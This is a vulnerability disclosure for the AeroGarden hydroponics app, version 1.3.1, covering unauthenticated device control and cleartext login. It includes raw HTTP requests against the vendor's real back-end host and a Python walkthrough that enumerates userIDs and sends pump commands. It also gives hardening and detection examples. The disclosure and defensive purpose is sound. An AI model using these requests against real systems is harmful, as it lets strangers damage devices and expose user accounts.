AeroGarden Version 1.3.1 - Multiple Vulnerabilities

by Jason Gay, on Jul 30, 2019 10:16:40 AM

ADVISORY SUMMARY

AeroGrow International is a company that produces consumer hydroponic growing
hardware for plants (e.g., herbs, vegetables, and flowers). The hardware product can be
controlled with a mobile application for specific models of their hydroponic growing kits.
The vendor's official website is http://www.aerogarden.com. The latest version of the
mobile application at the time of testing was 1.3.1.

Impact

Both identified vulnerabilities affect AeroGarden users directly: an unauthenticated remote attacker can change the settings of other users' Wi-Fi-enabled gardens (for example, running the pump or altering the light cycle) and damage plant life, and an attacker able to capture the application's cleartext traffic can obtain the user's login credentials and access the user's account information.

Risk Level

Medium (Incorrect Access Controls) and High (Insecure Network Transmission)

Affected Vendor

  Product Vendor            Product Name   Affected Version
  AeroGrow International    AeroGarden     1.3.1

Vulnerabilities List:

  Vulnerability                   Solution
  Incorrect Access Controls       Implement proper access controls for user actions throughout the application.
  Insecure Network Transmission   Enforce the use of secure channels for data transmission.

Credits

Jason Gay, Security Associate, Bishop Fox - jgay@bishopfox.com

Timeline

  1. 02/20/2019: Initial discovery
  2. 03/21/2019: First attempt to contact vendor
  3. 04/17/2019: First contact with vendor
  4. 07/30/2019: Public Disclosure

VULNERABILITIES

Incorrect Access Controls

This version of the AeroGarden application is affected by incorrect access controls. Any user can request information about other users’ Wi-Fi-enabled AeroGarden hardware products, and then use this information to change settings (such as water pump run time, light settings, and vacation mode settings). The vulnerability can be exploited by any remote user without authentication.

  CVE ID   Security Risk   Impact                     Access Vector
  N/A      Medium          Incorrect Access Control   Remote


Further Details

  • CVSS Base Score: 5.3
  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

By observing the communication between the mobile application and the Amazon EC2 back end, the testing team found that requests to execute commands on the AeroGarden hardware required only the MAC address of the hardware (the airGuid parameter) and the numerical user ID (userID) associated with it. Neither value is a secret: as shown below, the back end returns the airGuid for any userID on request.

The testing team obtained this information by issuing the following request:

Request 

POST /api/Custom/QueryUserDevice HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 12
Accept-Encoding: gzip, deflate

userID=[REDACTED]

The response returned the full device record for that user, including the airGuid (the plantedName field is Base64-encoded; the value shown decodes to "Kitchen"):

Response

[
  {
    "configID": [REDACTED],
    "airGuid": [REDACTED],
    "lightCycle": "08000100",
    "pumpCycle": "00050037",
    "lightTemp": 1,
    "lightStat": 1,
    "clock": "160503",
    "pumpStat": 0,
    "pumpHydro": 0,
    "pumpTest": 1,
    "pumpDrain": null,
    "pumpDrainState": null,
    "pumpLevel": 0,
    "pumpRemind4Hour": 0,
    "gardenType": 2,
    "plantedType": 0,
    "plantedName": "S2l0Y2hlbg==",
    "totalDay": 120,
    "plantedDay": 47,
    "nutriCycle": 14,
    "nutriRemindDay": 12,
    "nutriStatus": 0,
    "alarmAllow": 0,
    "plantedDate": "d2:40:d0:55:94:89",
    "nutrientDate": [REDACTED],
    "updateDate": "2019-02-22T02:28:31",
    "createDate": null,
    "swVersion": "MFW-V0.20",
    "hwVersion": "SW-V1.18",
    "bwVersion": "HW-V3.0",
    "oldPlantedDay": 47,
    "deviceID": "[REDACTED]",
    "deviceIP": "[REDACTED]",
    "chooseGarden": 0,
    "oldlightCycle": null,
    "vacationMode": 0,
    "bwConnectedSsid": null,
    "nutriStatusFlag": "0",
    "nutriStatusDate": "0001-01-01T00:00:00",
    "remark": null,
    "imgUrl": null,
    "timezone": "0",
    "audioAlarmStat": 0,
    "audioAlarmCycleSet": 0,
    "audioAlarmCycle": null
  }
]

By iterating through the possible 5-digit userID values during testing, the team could retrieve the MAC addresses (airGuid) of various units not under their control. These two values were all that was needed to issue commands to the hardware.

With this information, an attacker could issue the following command to turn on the water pump for one minute:

POST /api/Custom/UpdateDeviceConfig HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 118
Accept-Encoding: gzip, deflate

airGuid=[REDACTED]&chooseGarden=0&plantConfig=%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D&userID=[REDACTED]

It was confirmed that the unit then ran its pump for one minute (the plantConfig parameter is URL-encoded JSON; decoded, it is {"pumpTest": 1}). By reviewing the options available in the mobile application, the team found that other commands could be issued in the same way to alter the light cycle, set vacation mode, or return the device to its default settings. An attacker could run the pump motor until it is damaged, or change settings and timing to damage the plant life in the system.

No authentication was required for exploitation.
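The access-control failure described above, reduced to a runnable model. This is an added example written for this page, not the vendor's back-end code: it simulates the QueryUserDevice and UpdateDeviceConfig handlers as the advisory observed them, runs the unauthenticated enumerate-then-command sequence against that model, and places a hardened handler beside the vulnerable one. The device table, the userID and airGuid values, the ALLOWED_SETTINGS list and the session_user parameter are constructed assumptions.

```python
"""Added example, not the vendor's code: a simulated AeroGarden back end that
reproduces the missing object-level authorization behind UpdateDeviceConfig,
with a hardened handler beside it.  All device records, userID and airGuid
values are constructed placeholders."""
import json
from typing import Dict, Optional
from urllib.parse import parse_qs


class AuthorizationError(Exception):
    pass


def sample_devices() -> Dict[str, dict]:
    """Constructed device table keyed by numerical userID (hypothetical values)."""
    return {
        "10001": {"airGuid": "aa:bb:cc:dd:ee:01", "pumpTest": 0, "vacationMode": 0},
        "10002": {"airGuid": "aa:bb:cc:dd:ee:02", "pumpTest": 0, "vacationMode": 0},
    }


def parse_update_body(body: str) -> dict:
    """Decode an UpdateDeviceConfig form body.  plantConfig travels as URL-encoded
    JSON (the advisory's %7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D is a JSON
    object setting pumpTest to 1), so it is decoded twice: form field, then JSON."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    fields["plantConfig"] = json.loads(fields.get("plantConfig", "{}"))
    return fields


def query_user_device_vulnerable(devices: Dict[str, dict], user_id: str) -> Optional[dict]:
    """Mirrors QueryUserDevice as observed: any caller can look up any userID,
    which is what makes enumerating the 5-digit userID space productive."""
    return devices.get(user_id)


def update_device_config_vulnerable(devices: Dict[str, dict], body: str) -> dict:
    """Mirrors the observed behaviour: a matching airGuid + userID pair is the
    only check, and both values are obtainable without authentication."""
    req = parse_update_body(body)
    device = devices.get(req.get("userID", ""))
    if device is None or device["airGuid"] != req.get("airGuid"):
        raise KeyError("no such device")
    device.update(req["plantConfig"])
    return device


ALLOWED_SETTINGS = {"pumpTest", "lightCycle", "pumpCycle", "vacationMode"}  # assumed


def update_device_config_fixed(devices: Dict[str, dict], body: str,
                               session_user: Optional[str]) -> dict:
    """Hardened handler.  A session mechanism is assumed to exist and to yield the
    authenticated userID; the device is resolved from that session, never from
    the client-supplied userID, and only known settings are writable."""
    if session_user is None:
        raise AuthorizationError("authentication required")
    req = parse_update_body(body)
    if req.get("userID", session_user) != session_user:
        raise AuthorizationError("userID does not match the authenticated user")
    device = devices.get(session_user)
    if device is None or device["airGuid"] != req.get("airGuid"):
        raise AuthorizationError("device not owned by the authenticated user")
    unknown = set(req["plantConfig"]) - ALLOWED_SETTINGS
    if unknown:
        raise ValueError("unsupported settings: %s" % sorted(unknown))
    device.update(req["plantConfig"])
    return device


def is_denied(devices: Dict[str, dict], body: str, session_user: Optional[str]) -> bool:
    """True when the hardened handler refuses the request."""
    try:
        update_device_config_fixed(devices, body, session_user)
    except AuthorizationError:
        return True
    return False


PUMP_ON = "%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D"   # the plantConfig shown above


def attacker_walkthrough(devices: Dict[str, dict]) -> Dict[str, str]:
    """Unauthenticated attacker against the vulnerable handlers: walk the 5-digit
    userID space, harvest each airGuid, then replay the pump-on request."""
    harvested: Dict[str, str] = {}
    for uid in range(10000, 100000):
        rec = query_user_device_vulnerable(devices, str(uid))
        if rec is not None:
            harvested[str(uid)] = rec["airGuid"]
            if len(harvested) == len(devices):
                break                    # constructed table is tiny; stop early
    for uid, guid in harvested.items():
        body = "airGuid=%s&chooseGarden=0&plantConfig=%s&userID=%s" % (guid, PUMP_ON, uid)
        update_device_config_vulnerable(devices, body)
    return harvested


def pump_states_after_attack() -> Dict[str, int]:
    """Run the walkthrough on a fresh table and report each unit's pumpTest flag."""
    devices = sample_devices()
    attacker_walkthrough(devices)
    return {uid: d["pumpTest"] for uid, d in devices.items()}


if __name__ == "__main__":
    print("harvested:", attacker_walkthrough(sample_devices()))
    print("pumps after attack:", pump_states_after_attack())
    body = "airGuid=aa:bb:cc:dd:ee:02&chooseGarden=0&plantConfig=%s&userID=10002" % PUMP_ON
    print("fixed, no session:", is_denied(sample_devices(), body, None))
    print("fixed, other user:", is_denied(sample_devices(), body, "10001"))
    print("fixed, owner:", update_device_config_fixed(sample_devices(), body, "10002"))
```

The design point is in update_device_config_fixed: the target device is looked up from the authenticated session, so a client-supplied userID and airGuid can never select someone else's garden, and the enumeration step in attacker_walkthrough yields nothing usable. The settings whitelist is the example's own addition; the real API's writable fields are not documented in the advisory.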

Insecure Network Transmission

The AeroGarden application transmits not only its device-command requests in cleartext, but also the login credentials for the user's account.

  CVE ID   Security Risk   Impact                   Access Vector
  N/A      High            Information Disclosure   Remote


Further Details

  • CVSS Base Score: 9.1
  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

As shown with the Incorrect Access Control issue in this application, network communication between the mobile application and the Amazon EC2 instance occurs over insecure HTTP channels. During testing, insecure transmission of login information from the application was observed, as shown below:

POST /api/Admin/Login HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 61
Accept-Encoding: gzip, deflate

mail=[REDACTED]&userPwd=[REDACTED]

An attacker positioned to capture this traffic could use the credentials to log in to the user's account on the AeroGarden website, where personal information such as the user's address and payment details is accessible if the user has saved it there.
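What a passive observer actually recovers from this cleartext traffic, as an added example that is not part of the advisory or the vendor's code. The captured requests below are constructed, modeled on the requests shown in this advisory, with placeholder email, password, airGuid and userID values; the parser and the finding rule are the example's own. It flags two things the two issues combine on: credentials in /api/Admin/Login, and the airGuid/userID pair that the access-control issue turns into device control.

```python
"""Added example, not from the advisory or the vendor: what an on-path observer
recovers from the cleartext AeroGarden API traffic, as a check that flags
requests carrying credentials or device-control parameters over plain HTTP.
The captures are constructed, modeled on the advisory's requests, with
placeholder credential, airGuid and userID values."""
import json
from typing import List
from urllib.parse import parse_qs

# Constructed captures.  'tls' records whether the TCP session was encrypted;
# only for a cleartext session does the observer hold the request bytes.
CAPTURED: List[dict] = [
    {"tls": False, "raw":
        "POST /api/Admin/Login HTTP/1.1\r\n"
        "Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)\r\n"
        "\r\n"
        "mail=grower%40example.com&userPwd=Sup3rSecret"},
    {"tls": False, "raw":
        "POST /api/Custom/UpdateDeviceConfig HTTP/1.1\r\n"
        "Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)\r\n"
        "\r\n"
        "airGuid=aa:bb:cc:dd:ee:02&chooseGarden=0"
        "&plantConfig=%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D&userID=10002"},
    # With the recommended fix the same login rides inside TLS: no bytes to parse.
    {"tls": True, "raw": None},
]


def parse_http_request(raw: str) -> dict:
    """Minimal HTTP/1.1 request parser: request line, headers, form body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"method": method, "path": path, "headers": headers, "form": form}


CREDENTIAL_FIELDS = {"mail", "userPwd"}
DEVICE_CONTROL_FIELDS = {"airGuid", "userID"}


def cleartext_findings(captures: List[dict]) -> List[dict]:
    """One finding per cleartext request that exposes something an attacker can
    use: account credentials, or the airGuid/userID pair needed to drive a unit."""
    findings = []
    for cap in captures:
        if cap["tls"] or cap["raw"] is None:
            continue                      # encrypted session: nothing observable
        req = parse_http_request(cap["raw"])
        form = req["form"]
        if CREDENTIAL_FIELDS & set(form):
            kind = "credential"
        elif DEVICE_CONTROL_FIELDS <= set(form):
            kind = "device-control"
        else:
            continue
        interesting = sorted(CREDENTIAL_FIELDS | DEVICE_CONTROL_FIELDS)
        finding = {
            "kind": kind,
            "path": req["path"],
            "host": req["headers"].get("host"),
            "user_agent": req["headers"].get("user-agent"),
            "fields": {k: form[k] for k in interesting if k in form},
        }
        if "plantConfig" in form:
            finding["plantConfig"] = json.loads(form["plantConfig"])   # URL-decoded JSON
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in cleartext_findings(CAPTURED):
        print(f)
```

On a real capture the same rule keys on the User-Agent prefix BountyWiFi/1.3.1 and the port 8080 cleartext session to the EC2 host; once the application enforces TLS (the advisory's recommended fix) the third capture is all an observer sees, and the rule produces nothing.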
